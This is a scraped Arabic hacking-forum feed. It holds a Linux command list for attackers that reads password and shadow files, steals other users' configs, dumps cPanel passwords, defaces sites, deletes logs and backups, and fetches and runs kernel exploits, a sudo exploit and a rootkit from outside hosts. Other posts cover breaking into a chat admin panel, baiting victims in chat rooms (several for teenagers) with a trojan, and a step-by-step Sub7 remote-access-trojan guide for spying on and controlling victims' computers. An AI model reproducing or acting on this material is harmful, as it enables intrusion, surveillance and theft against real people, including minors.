Quantcast
Channel: منتديات جيوش الهكرز
Viewing all 6273 articles
Browse latest View live

جميع اوامر لينكس

$
0
0

جميع اوامر ( Linux )‏

بسم الله الرحمن الرحيم


اغلب الاوامر التى يحتاجها الهكر فى النظام للتعامل معه


cat /etc/passwd | cut -d ":" -f1


1- أمر إظهار يوزرات المواقع :
ls -la /etc/valiases
او
cat /etc/passwd
او
ls /var/mail
او
cat /etc/shadow
او
cat /etc/domainalias



ln -s / etc/passwd w
يسحب لك الملف بملف أسمه w


rm angel.php <------لحذف ملف
rm -r angel<------ لحذف مجلد
find angel.php <------لعمل بحث عن ملف
find *.php <------لعمل بحث عن جميع الملفات بهذا الامتداد
-----------------------------------------

أمر التأكد من صلاحية سحب الملفات علي السيرفر
which xxxx <------ بدل العلامات بأمر السحب
xxxx = أمر السحب
اومر السحب
wget
curl -o
get
lynx -source
------------------------------------


هذا االامر الي معي حلو يخليك ما تمشور مشوار .... هذا يطلعلك الملفات الي داخل مجلد boot
تقدر تغيير مجلد boot الى
----------------------------------------------


كود:
cd /boot;ls -al
etc << لفحص بعض الملفات ومنها قد تجد ثغرة confixx
usr << لمعرفة برامج السيرفر
opt < بعض السيرفرات تلقاه بالمجلد الرئيسي بعضها لا

--------------------------------------------



last -20 -a : عرض آخر 20 اسم تم تسجيل دخولهم
ps -ax : عرض الـ Processess
lsmod : الـ modules الموجوده في الكيرنال
uname -a : لعرض معلومات الكرنال
اوامر بسيطه
mv : تغيير الإسم
cp : نسخ ملف
cp -R : نسخ مجلد
ln : إنشاء رابط ( link ) لملف
gerp : البحث داخل ملف

-----------------------------------


لو اردت معرفة هل البورت مفتوح11457 راح اطبق التالي :
netstat -an|grep 11457

---------------------------------------------


امر للتاكد من وجود ملف

كود:
ls file
حلو بدل ما تكتب ls ويطلع لك ملفات وتخش عيونك على بعض
ويمكن تستخدمه للتاكد من وجوده ومعرفه التصريح
كود:
ls -al file

------------------------------------------------

أوامر إحترافيه :
1- إظهار اليوزرات بشكل مرتب :
awk -F: '{ print $1 }' / etc/passwd | sort

2- معرفة البرامج المستخدمه من قبل اليوزر والرووت ( من ضمنها اسم برنامج الاف تي بي )
ps -o "%u : %U : %p : %a"

3- معلومات كامله واحترافيه عن ال processess مع تحديد اليوزر المستخدم للبروسيس
ps -eo pid,tt,user,fname,tmout,f,wchan

4- ال processess ليوزر معين ؟ ( استبدل user فقط في هذا الأمر )
ps -U user -u user -N

5- اليوزرز المتصلين الآن
users

6- عرض آخر اليوزرز اللي دخلو :
last

7- لجلب معلومات عن مستخدم معين ( استبدل user في هذا الأمر )
finger user

8- امر معرفة اسماء اليوزرز المتصلين بالسيرفر .. وافعالهم
w

9- عرض البورتات المفتوحه
netstat -lnp --ip

-------------------------------------------


touch angel.php ينشئ لك ملف ضمن المجلد
++g : كومبيلر لل C++ و C
gcc : كومبيلر لل C++ و C
grep : يستخدم للبحث عن شئ داخل ملف
gzip : لضغط ملفات
gunzip : لضغط ملفات
وال un لفك الضغط بالاستعانه مع الاوامر اللي فوق مثال : ungzip unzip
haltsys : لاغلاق النظام
cat : لعرض محتوى اكثر من ملف مع بعض
cd : لتغير الدليل الذي انت عليه
chmod : لتغير تصريح دخلول ملف معين
chown : لتغير مالك ملف معين
clear : لمسح كل الذي على الشاشة
cmp : لمقارنة ملفين
cp : لنسخ الملفات
crypt : لتشفير و فك تشفير الملفات
csplit : لتقسيم الملف الى عدة ملفات
cu : لطلب تريمنال يونكس اخر
whoami يقول لك من انت (يعني من انا ) يقول لك root او مستخدم xxx
rm : لمسح ملفات او مجلدات ( خاليه )
rmdir : لمسح مجلد ( خالي )
وفي حال كنت بالترمنال اضغط على زر التاب Tap يعرض لك كل اوامر اللينكس
ومثلاً اي امر تحب تعرف شو هووا فقط اكتب الأمر وبعدها هيلب :
مثال rm --help

--------------------------------------------------

أوامر رائعه :
لمعرفة جميع ملفات اسم مستخدم معين ( استبدل john )
find /home -user john

لمعرفة الملفات اللتي تم تعديلها في خلال الـ 24 ساعه ( أمر مهم )
find $HOME -mtime 0

لمعرفة المساحه المستخدمه
df -h
لمعرفة المساحه المتبقيه
du

-----------------------------------------

وهذي مجموعة من الأوامر البسيطة
ls -m
يظهر الملفات مع تفريقهم بفواصل بدلا من تفريقهم بخانات
ls -t
يظهر الملفات حسب تواريخ إنشائها يعني من الجديد إلى القديم
ls -lu
يظهر الملفات حسب آخر تاريخ زيارة لهذه الملفات (مع تبيين هذا التاريخ)
ls -F
يظهر الملفات بأنواعها حيث :
الملفات المسبوقة ب / عبارة عن مجلدات
الملفات المسبوقة ب * عبارة عن ملفات تنفيذية
الملفات المسبوقة ب @ عبارة عن روابط
ls -S
يظهر الملفات تسلسليا من الأكبر إلى الأصغر
ls -X
يظهر الملفات ويرتبها حسب امتدادها
ls -r
يظهر الملفات مرتبة بالمقلوب (يعني من z ثم y ثم x ....)
cp
لنسخ ملف أو مجلد
mkdir
لإنشاء مجلد
mv
لتحويل ملف من مجلد إلى مجلد أو إعادة تسميته
(مثلا
mv angel gnom
راح يعيد تسميت المجلد angel إلى gnom
أو
mv angel.php /ho me/hackteach/publi c_htm l/cc/test
راح يحول الملف angel.php من المجلد إلي هو فيه إلى المجلد الجديد test)

---------------------------------------


ln -sf / home / user / public_html / vb / in clude s / c onfig . php conf.txt
راح يجيب لك نسخـة من ملف الكونفق تبع اليوزر المحدد في الملف الجديد conf.txt
بالعربي ,, الأمر هذا هو حق السم لينك ,, symLink

---------------------------------------
أمر لمعرفة اليوزر اللي مستهلك أكبر مساحه :
du -s / home | sort -rn
( بدون مسافه بعد / و home )
-----------------------------------

النسخ واللصق بهالطريقة
c p /ho me/hi.t xt /ho me/jack
أو العكس


----------------------------
لعمل ماس ديفاس بعد اخذ الروت
كود PHP:
find / -name "index.*" -exec cp /t mp/index.htm


----------------------------------------------
أمر إظهار باسوردات السي بانل ( في حالة كنت روت ) :
في أوامر كثيره .. بعضها :
find / -name service.pwd
او
cat / home/*/public_html/_vti_pvt/service.pwd

و

cat / var/cpanel/accounting.log
( لاتنسى تحذف المسافات قبل var و home )


--------------------------------------------


1- حذف ملفات اللوقو
rm -rf / tmp/logs
rm -rf $HISTFILE
rm -rf / root/.ksh_history
rm -rf / root/.bash_history
rm -rf / root/.ksh_history
rm -rf / root/.bash_logout
rm -rf / usr/local/apache/logs
rm -rf / usr/local/apache/log
rm -rf / var/apache/logs
rm -rf / var/apache/log
rm -rf / var/run/utmp
rm -rf / var/logs
rm -rf / var/log
rm -rf / var/adm
rm -rf / etc/wtmp
rm -rf / etc/utmp
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

-------------------------------------------------


2- أمر تعديل ملفات اللوقو ( إخفائها .. آمن )
cat / dev/null > / var/log/kdebug
cat / dev/null > / var/log/kernel
cat / dev/null > / var/log/maillog
cat / dev/null > / var/log/messages
cat / dev/null > / var/log/secure
cat / dev/null > / var/log/svclog
cat / dev/null > / var/log/tcdebuglog
cat / dev/null > / var/log/tclient
cat / dev/null > / var/log/tivoLog.prv
cat / dev/null > / var/log/tivoLog.pub
cat / dev/null > / var/log/tivoweb.log
cat / dev/null > / var/log/tvdebuglog
cat / dev/null > / var/log/tverr
cat / dev/null > / var/log/tvlog
3- أمر قرائة ملف الكونفيج على السيرفر
cat / usr/local/apache/conf/httpd.conf
4- أمر عرض الملفات Suid ( ملفات من قبل الروت لكن يستطيع اليوزر تشغيلها )
find / -type f -perm -04000 -ls

-------------------------------------------------

5- أمر عرض الملفات Sgid ( ملفات من قبل الروت لكن تستطيع المجموعه تشغيلها )
find / -type f -perm -02000 -ls
6- أوامر عرض المجلدات المصرح لها تصريح 777
find / -perm -2 -ls
find / -type d -perm 0777 | xargs ls -alld
find / -type d -pem -2 -ls
7- أمر حذف جميع الباك آب الموجوده على السيرفر
find / -name "cpbackup*" -exec rm {} ;
find / -name "backup*" -exec rm {} ;
8- أمر إستبدال جميع الإندكسات إلى الإندكس الموجود على المسار الحالي
find / -name "index.*" -exec cp index.htm {} ;
find / -name "default.*" -exec cp index.htm {} ;
9- أمر تعديل صلاحيات الإندكسات إلى nobody ( لكي لا يشك اليوزر )
find / -name "index.*" -exec chown 99 index.html {} ;
find / -name "default.*" -exec chown 99 index.html {} ;
10- أمر عرض System log
cat / etc/syslog.conf
11- أمر عرض معلومات عن الذاكره
cat / proc/meminfo
12- أمر تعديل دوال php والسيف مود وغيرها
pico / usr/local/lib/php.ini
13- أمر عرض البورتات المفتوحه
netstat -atup | grep IST
14- أمر عرض آخر إتصال
lastlog
15- أمر عرض اليوزرات المتصله
w

--------------------------------------------------

16- أمر لمعرفة إصدار الكيرنال
dpkg --list | grep linux-image
rpm -q kernel : kernel-2.6.18-53.1.4.el5
uname -s : SunOS
uname -r : 2.6.22-14-EL5
uname -mrsn : Linux s.server.com 2.6.18-53.1.4.el5 x86_64
cat / proc/version : Linux version 2.6.18-53.1.4.el5 (b@redhat.com) (gcc version 4.1.2 20070626 (Red Hat 4.1.2-14)) #1 SMP Wed Nov 14 1027 EST 2007
17- أمر إيقاف process معين عن العمل
kill -9 PID
kill PID
مع إستبدال PID لرقم البروسيس .. تستطيع معرفته عن طريق الأمر
ps ux
ps aux
top
18- أمر عرض الأوامر ( او بالأصح الملفات التنفيذيه ) اللتي عليها Suid ( يستطيع اليوزر تشغيلها )
find / bin / usr/bin / usr/local/bin / sbin / usr/sbin / usr/local/sbin -perm -4000 2> / dev/null
19- أمر عرض اليوزرات اللتي لا تحتوي على باسورد
cut -d: -f1,2,3 / etc/passwd | grep

---------------------------------------------------------------


20- أمر عرض الملفات اللتي تريد الكتابه عليها في مجلد etc
find / etc/ -type f -perm -o+w 2> / dev/null
21- أمر عرض أوامر السحب المفعله كـ wget
which wget curl w3m lynx
22- أمر عرض معلومات عن المعالج CPUINFO
cat / proc/version / proc/cpuinfo
23- أمر عرض مساحات الهاردسك
du
( ملاحظه : تستطيع إستخدامه مع option اخرى .. لاحظ الأوامر التاليه )
du -s / home/user | sort -rn
df -Th
24- أمر التأكد من وجود المترجم gcc
locate gcc
25- أمر إستخدام Wipelogs ( للتعديل على الوقو .. أمن )
wget No Results Found Packet Storm | gcc zap2.c -o zap2 | ./zap2
26- أمر تنفيذ بعض الهجمات على الكيرنال
wget http://ftp.powernet.com.tr/supermail/debug/k3 | ./k3 1 | ./k3 2 | ./k3 3 | ./k3 4 | ./k3 5
27- إستخدام ثغرة stack overflow عن طريق sudo
wget http://precision-gaming.com/sudo.c | gcc sudo.c -o sudosploit | ./sudosploit
28- أمر تثبيت روت كت لإصدار 2.6
wget twofaced.org | gcc linux2-6-all.c -o linuxkernel | ./linuxkernel
29- أمر استخدام سكربت Mig LogCleaner
wget twofaced.org | gcc -DLINUX -WALL mig-logcleaner.c -o migl | ./migl -u root 0
30- أمر لمعرفة الملفات والمجلدات اللتي تم تعديلها في خلال X يوم
find / -mtime x
( ملاحظه : استبدل time إلى min للبحث في الدقائق .. ليصلح mmin )
31- أمر لمعرفة الملفات والمجلدات اللتي تم تعديل خصائصها ( كـ الملكيه ) في خلال X يوم
find / -ctime x
32- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر تنفيذها
find / -perm +4000 -user root
33- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر الكتابه عليها
find / -perm +002 -user root
34- للبحث عن الملفات اللتي ليس لديها مالك
find / -nouser
35- للبحث عن الملفات اللتي مالكها هو اليوزر root
find / -user root
36- من الأوامر التفصيليه لـ find
find / -name "*.txt" -size +10k -user root -not -perm +o=r -exec chmod o+r {} \;
شرح الأمر :
ابحث في جميع المجلدات .. عن اي ملف نصي امتداده txt
وحجمه أكثر من 10 كيلو بايت .. وصاحبه اليوزر root
وغير قابله للقراءه من اي يوزر اخر ماعدا مالكها الأصلي
يستطيع صاحبها قرائتها وويستطيع تنفيذها ( execution ) ( ورمزه -r-xr--r-- )


----------------------------------------

37- وتستطيع إستخدام أمر find بشكل آخر .. مثل : find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \; شرح الأمر : عرض جميع الملفات فقط .. اللتي لديها خاصيتي SetUID و SetGID بشكل مفصل

أختراق الشات الصوتي +سحب اللوحة+ سحب اكواد الماسترية

$
0
0
بسم الله الرحمن الرحيم

دخول على لوحة التحكم أستخراج اليوزر وكسر الباسوورد أو سحب اكواد الماسترية نبدا على بركة الله


تابع معــــي


ا
لشرح الي فوق هاذا مثال على الوحه فقط ..


وهذا مثال كيف تعرف اليوزر مال ألادمن والباس

الكود :: 5060
الباسوورد ::Mzk2Ng==

الان نجي لفك التشفير

ندخل على الرابط هاذا

كود PHP:

http://home.paulschou.net/tools/xlate/ 


طبعا اليوزر يجي على اسم الموقع 99% معروف جدا طيب للحين مخلصنا

نجي الأهم والمهم تقول طلعت اللوحة واليوزر ومقدرت اكسر الباسوورد لا يضيق صدرك أخليك تدخل ماستر أو ادمن


انتهبنـآ من الشـرٍح عجبـك الموضـوع قيمنـى

دورة فيجوال بيسك الجزء الاول

$
0
0




اول شيء حاب كول الكم الشرح ليس انا من عمله

ولاكن عندما دخلت الى عالم الفجوال بيسك وجدت هذا الشرح

وهو شرح جميل وانا تعلم الفجوال بيسك من عندة

الشرح فيديو صورة وصوت بالعربي

تحياتي لكم اترككم مع الشرح


الدرس الاول - شرح تنصيب برنامج الفيجوال بيسك 6


الدرس الثاني - شرح واجهة برنامج الفيجوال بيسك 6


الدرس الثالث - الجزء الاول - شرح استخدام صندوق الادوات


الدرس الثالث - الجزء الثاني - شرح استخدام صندوق الادوات

دورة فيجوال بيسك الجزء الثاني

$
0
0

اول شيء حاب كول الكم الشرح ليس انا من عمله

ولاكن عندما دخلت الى عالم الفجوال بيسك وجدت هذا الشرح

وهو شرح جميل وانا تعلم الفجوال بيسك من عندة

الشرح فيديو صورة وصوت بالعربي

تحياتي لكم اترككم مع الشرح


الدرس الرابع - الجزء الاول - شرح عمل برنامج بعدة نوافذ


الدرس الرابع - الجزء الثاني - شرح عمل برنامج بعدة نوافذ


الدرس الخامس - شرح عمل تصميم للبرنامج بواسطة الفوتوشوب


الدرس السادس - شرح حفظ البرنامج بتفاصيل اكثر احترافيه


اخر شي أرجو تتبيت من الإدارة و تقييم من أعضاء

تقبلوا تحياتي مع دورة الأخيرة

دورة فيجوال بيسك الجزء الثالث

$
0
0


اول شيء حاب كول الكم الشرح ليس انا من عمله

ولاكن عندما دخلت الى عالم الفجوال بيسك وجدت هذا الشرح

وهو شرح جميل وانا تعلم الفجوال بيسك من عندة

الشرح فيديو صورة وصوت بالعربي

تحياتي لكم اترككم مع الشرح


الدرس السابع - التعامل مع النصوص نسخ و لصق


الدرس الثامن - التعامل مع المجلدات انشاء و حذف


الدرس التاسع - تغيير طريقة عرض البرنامج على الشاشه


الدرس العاشر - مشروع الدوره ( حماية جهازك من المتطفلين )


اخر شي أرجو تتبيت من الإدارة و تقييم من أعضاء

تقبلوا تحياتي مع دورة الأخيرة

جلب ضحايا للمبتدئين

$
0
0
طريقة جلب ضحايا

السلام عيكم ,

ورحمه الله وبركاته ,

اليوم حاب اقدم لكم موقع شآت لجلب الضحايا فقط عليك رفع سيرفرك إلى موقع رفع مبآشر

هي روابط الشات

Free live video chat rooms by Usachatnow.com
.
http://chatframe.walla.co.il/chat.aspx
.
#1 Chat Avenue - Free chat rooms for family, friends and strangers
.
Chat on KissChat.co.uk The UK's No.1 Free Online Chat Room!
.
UK Chatterbox chat rooms
.
Senior Chat - Chat rooms for older, more mature chatters.
.
321ukchat.co.uk
.
321 Teen Chat - Free Chat Rooms For Teenagers
.
Latin Chat - Free chat rooms for chatters of latin descent.
.
Gay Chat - Free chat rooms for men.
.
Error : File Not Found
.
/chat/israel-chat - TeenChat.com
.
/chat/denmark-chat/ - TeenChat.com
.
Chatbots.org - Denmark - Virtual assistants, virtual agents, chat bots, conversational agents, chatterbots, chatbots: examples, companies, news,directory
.
Israel - ICQ Chat Rooms - ICQ.com
.
Chatpit - Free Teen Chat Rooms
.
the ['fuge] - Free All Ages Chat
.
http://www.chatcache.com/teen
.
http://www.usachatnow.com/chat.php
.
Chatpit - Free Teen Chat Rooms
.
Free Teen Chat Rooms 13-19 Teen Chat Center - ChatMaze
.
the ['fuge] - Free All Ages Chat
.
http://www.chatcache.com/teen/
.
http://www.usachatnow.com/chat.php

موقع الرفع برابط مباشر RGhost — file sharing

أفضل موقع على الإطلاق لإرسال رسائل مجانية سريعة وغير محدودة

$
0
0
السلام عليكم ورحمة الله وبركاته
أصبحنا نشاهد العديد من المواقع التي تقدم لمستخدميها خدمة إرسال رسائل مجانية ، حيث لا يكاد يمر وقت طويل حتى يتم اكتشاف موقع جديد ، بعد ذلك تصبح هذه الخدمة غير شغالة، وطبعا الهذف من ورائها التعريف أكثر بالموقع وكسب زوار كثيرون بطرق ذكية ومدروسة.

لكن مع موقع الأمر مختلف تماما ، فحسب قراءتي وبحثي عن هذا الموقع وجدت أنه يقدم هذه الخدمة مند مدة طويلة ، والجميل أنها لا زالت شغالة إلى يومنا هذا ، مع أيضا خدمة سريعة في إرسال هذه الرسائل ، ويمكنك اعتماده كلما أردت إرسال رسالة إلى أي هاتف وطني أو دولي .


طريقة عمل الموقع شبيهة بمعضم المواقع التي تقدم نفس الخدمة ، حيث تختار دولتك ثم تضع الرقم الدولي أو الوطني الذي تريد إرسال له هذه الرسالة مع كتابتها في الإطار المخصص لذلك ، وفي ظرف ثواني معدودات ستصل هذه الرسالة ، ويمكنك الرجوع لإرسال رسائل أخرى كثيرة في أ
رابط شرح
http://adf.ly/V8qDt
رابط موقع
http://adf.ly/V8qmu

البرنامج الشهير في إختراق ا لأجهزة Sub7 2.2 + صور +شرح (مهم جدا جدا)

$
0
0
برنامج السب سفن يعد واحدا من اهم برامج الأختراق نظر لسهولة استخدامه و كثرة اوامره لذلك فهو مفيد جدا بالنسبة للمبتدأين و نظرا لشيوع استخدامه فقد ظهرت منه اصدارات عديدة و كان منها الأصدار الذى سأقوم على شرحه الأن و هو Sub7 2.2

عليك اولا تحميل البرنامج

بعد فك ضغط البرنامج سوف تجد ملفاته كالأتى


اعتقد ان الصورة مش محتاجه لتعليق

فى البداية طبعا كل ما عليك هو ان تقوم بتغير اعدادات السيرفر حتى يناسبك من حيث المنفذ او البورت الذى تريده و كلمة السر و حالة وصول اعلام بريدى



لنبدأ بتعلم اولا كيفية اعداد السيرفر :

عليك بفتح الملف Edit Server كما هو موضح فى الشكل السابق و سوف تظهر لك الصورة التالية


سوف تظهر لك هذه الشاشة كل ماعليك هو ان تختار الخيار الموضع حوله أطار بالون الأحمر و هو باسم Run in normal mode

اى معناه بالعربى العمل تحت النظام العادى و هو للمبتدئ و هو الأسهل استخداما بعد ذلك سوف تظهر لديك الصورة التالية و التى هى واجهت ملف تعديل السيرفر

سوف يتم توضيح الصورة عبر الأرقام الموضحة عليها

1 قائمة توجد فيها الخيارات و الأمكانيات المسموحة لى لتعديل السيرفر و سوف يتم شرح كل واحة على حدا اما الأن فنحن تحت الخاصية server settinge و هذه الخاصية تعنى تعديل السيرفر

2 و هو رقم المنفذ الخاص بالسيرفر و يجب عليك ان تختار رقم خاص بك او تتركه كما هو و نصيحة لك اعمل رقم خاص بك حتى تحمى السيرفر من المتطفلين

3 و هنا يتم وضع كلمة سر خاصة بك

4 اعادة كتابة كلمة السر مرة اخرى

5 اسم الضحية و يمكنك من كتابة اى اسم حتى لو لم يكن اسم الضحية الأصلى

6 و هو لجعل رقم المنفذ هو الرقم الأفتراضى و يفضل عدم اختيار هذه الخاصية كما قلت سابقا حتى تحمى السيرفر

7 بعد اختيار هذه الخاصية سوف يعمل على جعل السيرفر يختفى من جهاز الضحية اى انه سوف يختفى الملف الأصلى و يتوغل فى الجهاز

8 باختيارك للاختيار الأول سوف يعمل على تسمية السيرفر باسمه الأصلى و الثانى يقوم بتسمية السيرفر بالأسم الذى تريده

9 وهو اخر شئ تقوم به بعد ان تعمل على تغير اعدادات السيرفر و هو لحفظ الأعدادات و وضع السيرفر الجديد و الذى سوف ترسله (( لا تقم بهذه العملية حتى ننتهى من جميع الأعدادات ))

10 و هو للأنتقال الى انظام المتقدم و هو صعب الأستخدام لذا لن نستعمله


نحن الأن فى خاصية التحكم فى خصائص السيرفر التى سوف تعمل مع اعادة تشغي الجهاز

1 في هذا القسم من البرنامج تستطيع تحديد الأماكن التي تريد من السيرفر أن يتوغل بها في جهاز الضحية، كأن يتوغل في ملف الــ Win.ini و الــ Registry و غيرها... و يفضل أن تختار جميع هذه الخيارات

2 و هو الأسم الذى سوف تختاره و الذى سوف يظهر السيرفر على اساسه فى الجهاز و يفضل لن تسميه اسم معروف كما هو موضح فى الشكل حتى لا يشك فيه الضحية

و فى هذا القسم و هو يوضح طرق التحكم فى الأعلام البريدى للسيرفر

1- وهنا سوف يتم اختيار الطريقة التى سوف يقوم السيرفر باعلامك بريديا عن طريقها اما مثلا عن طريق الأميل او ICQ او MIRC

2- المكان الذى سوف تظهر فى العلامات البريدية

3- سوف تظهر هذه الشاشة عند اختيارك لأعلام بواسط اميل و هو ثانية اختيار فى القائمة (1) و منها اكتب الأميل الذى تريد ان يصلك اعلام بريدى عليه

4- و سوف تظهر هذه الشاشة عند اختيارك للأعلام بواسطة ICQ و هى او خانة فى القائمة (1) و منها اكتب رقم ICQ الذى تريد ان يصلك الأعلام عبره

و للتوضيح عن الأعلام هو اعلام يأتيك من السيرفر ليخبرك برقم IP للضحية و البورت المفتوح فيه بعد ان يقوم الضحية بفتح السيرفر

فى هذا القسم سوف يتم توضيح التحكم فى السيرفر كما يلى

1- باختيارك لهذا الأمر سوف تكون قد اعطيت للسيرفر امر بان يظهر للضحية رسالة خطأ عند فتحه للسيرفر يمكن ان تتحكم فى شكل الرسالة

2- بالضغط على هذ الزرار ستظهر لك شاشة اخرى سوف تتحكم من خلالها على شكل رسالة الخطا التى سوف تظهر لدى الضحية

3- بالتاشير على هذه الخاصية يمكنك من التحكم فى شكلة ايقونة السيرفر

4- بالضغط على هذه الأيقونة يمكنك من اختيار شكل ايقونة مخزنة من على الجهاز

5- سوف يظهر فى هذا المربع شكل الأيقونة التى سيظهر عليها السيرفر و التى قمت انت باختيارها

6- تحتوى هذه القائمة على محموعة من الأيقونات التى يمكنك الأخيار من بينها

1- نبدأ من هنا التحكم فى شكل شاشة الخطا التى ستظهر مع تشغيل السيرفر

7- يمكنك الأختيار ما بين اشكال شاشات الخطا اما كرسالة تحزير او معلومة او خطأ او سؤال او لا تضع اى شئ

8- يمكنك من هنا اختيار الأزرار التى سوف تظهر على الشاشة

9- يمكنك من هنا تغير العنوان و النص للرسالة

10- بالضغط على هذا الزرار سوف تقوم باختبار الشاشة التى قمت باعداده

11- هذه هى الشاشة التى قمنا باعدادها من الأعدادات السابقة

بعد ذلك قم بحفظ العمل الذى قمت انت به و ذلك بالضغط على save as… وبعد ذلك سوف يتم حفظ السيرفر على جهازك احزر اياك انت ان تفتحه والا سوف يعمل عندك كل ما عليك ان ترسله الى الضحية و تقنعه بان عليه ان يفتحه بهذا تكون قد قمت باول خطوة فى عملية الأختراق يبقى لديك الخطوة التالية و هى التحكم فى الجهاز و هى الأكثر متعة

شاشة البرنامج الأساسية:

عندما تحصل على ضحية لديها منفذ للسب سفن اما عن طريق البحث عن الأيبيهات المصابة او عن طريق ارسال السيرفر كما وضحنا سابقا فانت عليك ان تفتح البرنامج لتبدا الأختراق و هذا ما سوف نتعلمه الأن

كل ما عليك لكى تشغل البرنامج هو ان تفتح البرنامج من الأيقونة المكتوب تحتها sub7 و التى هى كم وضحنا فى اول صورة بعد ذلك سوف تاتى لك شاشة تحميل كما يلى

اتركها تحمل حتى النهاية بعد ذلك سوف تكون قد دخلت الى البرنامج كل ماعليك فى البداية هو دراسة طريقة الأتصال بالسيرف و هى كما وضحنا فى موضوع سابقا انها موحدة تقريبا فى معظم البرامج عن طريق كتابة الipالمصاب فى المكان المخصص له و كتابة المنفذ فى المكان المخصص له ايضا ثم عمل كونيكت وهذا ما سوف نقوم به فى البرنامج كما موضح فى الصورة التالية

هذه هى الواجه الرئيسية للبرنامج

1هذه هى القوائم التى تحتوى على اوامر التحكم فى جهاز الضحية و هى ما سوف نوضحه الأن

2نكتب فى هذه الخانة رقم ip المصاب بالباتش

3 نكتب فيها رقم المنفذ الذى هو منفذ السيرفر و الذى قد كتبناه فى اعدادات السيرفر

4 بالضغط على هذا الأختيار نكون قد بدأنا بالأتصال بالسيرفر و بعد الأتمام نكون قد اخترقنا جهاز الضحية


5 توجد بها قائمة بالip الذى انت قمت باختراقها و منافذها

6 الحالة التى سوف يكون عليها السيرفر فاذا كانت Connected نكزن هكذا اخترقنا جهاز و اصبحنا قادرين على التحكم فيه وذلك عن طريق القوائم التالية و التى سوف نوضحها بالصور طبعا


فى هذه الصورة نكون قمنا باختيار اول قائمة سوف نتعامل معها و هى connction و التى سوف نستفيد منها فيما يلى

1- remote scanner و هى للبحث عن الأيبيهات المصابة و عند الضغط عليها نكون قد حصلنا على شاشة اخرى تظهر على اليمين و هى سهلة الفهم كل ماعليك هو ان تكتب رقم الip الذى سوف يبدأ من عنده فى خانة start ip و تكتب فى خانة end ip رقم ip الذى سوف ينتهى عنده البحث و فى خانة port تكتب رقم المنفذ ثم تضغط على start لتبدأ البحث و سوف تظهر لك النتائج فى المربع الذى يليه و لكى توقف البحث اضغط على stop سهلة صح

2- pc info يمكنك من هذه الخاصية من التعرف على امكانيات جهاز الضحية مثل سرعة المعالج و اسم الكمبيوتر و اسم صاحب الكموبيوتر مساحة القرص الصلب و ….. و يمكنك من حفظ هذه المعلومات

3- home info ويمكنك من معرفة معلومات عن الجهاز عن مثلا عنوانه بلده عمله …..

4- server options تمكنك هذه الخاصية من التحكم فى السيرفر فى عددة اتجاهات سوف تلحظها فمنها يمكنك من تغير المنفذ و تغير كلمة السر و حذف السيرفرو يمكنك من تغير هذه الأعدادت فى جهاز الضحية عن طريق تحميلها من ملف على الجهاز او من الأنترنت

فى هذه الصورة نكون قمنا باختيار قائمة keys/messages و التى سوف نستفيد منها فيما يلى :

1- التحكم فى لوحة المفاتيح

2- ارسال رسالة خطأ تظهر عند الضحية تقوم باعدادها كما وضحنا سابقا فى اعدادات اليبرفر فهما متشابهان فى طريق الأعداد مع اختلاف اننا فى هذه المرة سوف نرسلها الى الضحية مباشرتا

3- يمكنك هنا من التجسس على برامج الشات و هى msm messnger و برنامج yahoo messnger و برنامج ICQ و فمنها كل ما عليك هو ان تضغط على الرسمة الموجود فوق والدالة على البرنامج لتختار enable و بذلك تكون قد بدأت فى التجسس على المحادثات التى يقوم الضحية بها

4- يمكنك هنا من معرفة رقم الICQ الخاص بالضحية كل ما عليك هو ان تضغط على takeover لتنهى عملك

ى هذه الصورة نكون قمنا باختيار قائمة miscellaneous و التى سوف نستفيد منها فيما يلى :

1- يمكنك من التحكم بواسطته فى ملفات الضحية فعند الضغط عليه سوف يفتح لك شاشة فرعية بها كل ما انت تحتاجه و سوف نوضحه بعد قليل

2- من خلال هذا التحكم يمكننى معرفة النوافذ المفتوحة فى جهاز الضحية و التحكم فيها من عدة زواية منها اغلاق او اخفاء او الغاء امكانية نافزة معينة

1- 3-

3- وهو يعرض لك محتوايات الحافظة و امكانية التحكم فيها فعند الضغط عليه سوف تظهر لك النافذة التى على اليمين

4- تعرض فى هذا المكان محتوايات الحافظة

5- لقراءة محتوايات حافظة معينة

6- تغير محتوايات الحافظة و ذلك بالكتابة فى المكان رقم 5 و الضغط على 7

7- لتفريغ محتوايات الحافظة

هذه هى النافذة التى سوف تظهر لك بعد اختيارك لfile manager و سوف نوضحها بالتفصيل لأنى اعرف ان معظمك يحب هذا التحكم

1- لأختيار الدرايف الذى تريد اذهار ملفاته

2- لعمل ******* او اعادة تهيئ للدريفات فى حالة حدوث اى تغير

3- لأعادة التهيئة للملفات الموجود فى الملف الذى انت بداخله

4- لأعادة التهيئة للملفات داخل المجلد الرئيسى

5- لتحميل ملفات من جهاز الضحية الى جهازك

6- لعمل تحميل لملفات من جهازك الى جهاز الضحية ( العكس ) ( upload )

7- تشغيل ملف معين

8- للدخول الى فولدر معين

9- لحذف ملف معين

10- لأنشاء فولدر جديد

11- لتشغيل ملف صوت

12- للعمل على جعل الصورة المختارة خلفية لسطح المكتب لدى جهاز الضحية

13- لأعادة تسمية ملف

14- لعمل بحث فى جهاز الضحية

15- لتشغيل صورة معينة

هذه القائمة من اكثر القوائم متعة فمنها ممكن تجنن الضحية معاك ولن يعرف ماذا يحدث الا اذا انتبه ان جهازه قد تم اختراق لذا سوف نوضحها واحدة واحدة

1- Flip screen و منها يمكننا تغير وضعية الشاشة كما سوف نرى

2- يمكننى من قلب الشاشة افقيا

3- يمكننى من قلب الشاشة رأسيا

4- يمكننى من قلب الشاشة راسيا و افقيا

5- لاختيار موافق وارسال الأوامر لجعل شاشة الضحية تنقلب على حسب ما انت طلبت

هذه القائمة تتيح لك من طباعة ورقة على الطابعة لدى الضحية و طريقة ذلك هى ما سوف نوضحه الأن

Print manager و هى ما سوف نقوم باختياره من مجموعة القوائم و هى تعنى التحكم فى الطابعة

و يمكنك من كتابة النص الذى تريد طباعته لدى جهاز الضحية فى المربع الأزرق الموجود فى وسطه رقم 2

1- لجعل الخط اسود عريض

2- لجعل الخط مائل

3- لجعل هناك خط تحت الكلام

4- لجعل هناك خط يتوسط الكلام

5- لأختيار حجم الخط

6- الضغط هنا يعنى البدأ فى الطباعة

